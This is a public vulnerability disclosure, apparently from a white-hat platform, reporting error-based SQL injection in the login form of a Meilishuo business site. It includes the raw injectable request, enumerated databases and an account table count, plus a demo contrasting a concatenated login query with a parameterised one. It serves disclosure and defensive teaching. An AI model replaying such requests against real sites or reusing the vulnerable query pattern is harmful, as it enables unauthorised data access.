2015-03-28: Details reported to the vendor, awaiting vendor handling
2015-03-28: Vendor confirmed; details disclosed to the vendor only
2015-04-07: Details disclosed to core white hats and domain experts
2015-04-17: Details disclosed to regular white hats
2015-04-27: Details disclosed to intern white hats
2015-05-12: Details disclosed to the public

MySQL error-based injection on a Meilishuo site

Injection point in the login handler (the username field is marked with *):
POST /business/index.php/login/login HTTP/1.1
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
Referer: http://higo.meilishuo.com
Cookie: PHPSESSID=stur0o5qtitcqgev4dpmme0rq1
Host: higo.meilishuo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password=123456&username=*

available databases [6]:
[*] hg_ejabberd
[*] higo
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: higo [129 tables]
Database: higo
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| t_pandora_account | 151214  |
+-------------------+---------+

Fix: filter and escape user input.

Severity: High
Vulnerability Rank: 15
Confirmed: 2015-03-28 19:03
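Added illustration (not code from the report or from the vendor): the login query built by string concatenation beside the same query as a parameterised statement, showing why a single stray quote in the username produces a database error in the first form and a plain failed login in the second. The in-memory SQLite table, the user row and the function names are constructed for the demo; the site's own schema and PHP code are not known.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a login table (not the site's schema).
    The plaintext password column exists only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # String concatenation: the username becomes part of the SQL text, so a
    # quote in it breaks the statement. The resulting database error, if it
    # reaches the HTTP response, is exactly the signal error-based injection
    # relies on.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchone()[0] == 1


def login_safe(conn, username, password):
    # Parameterised query: values are bound separately and never become SQL
    # text, so there is nothing to escape and nothing to break.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] == 1


def probe(login, conn, username, password="123456"):
    """Return ('ok', logged_in) or ('error', message), i.e. what a tester
    observes: a leaked DB error versus a normal failed login."""
    try:
        return ("ok", login(conn, username, password))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    print(probe(login_vulnerable, db, "alice'"))   # ('error', ...)
    print(probe(login_safe, db, "alice'"))         # ('ok', False)
```

Escaping input (the report's suggested fix) closes the quoting hole; binding parameters removes the class of bug regardless of how the input is quoted, and suppressing database error text in responses removes the oracle that error-based injection reads.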
Thank you very much for your attention to Meilishuo security. The vulnerability has been verified as genuine and the business department has been contacted for an urgent fix.

2015-03-29: The vulnerability has been fixed.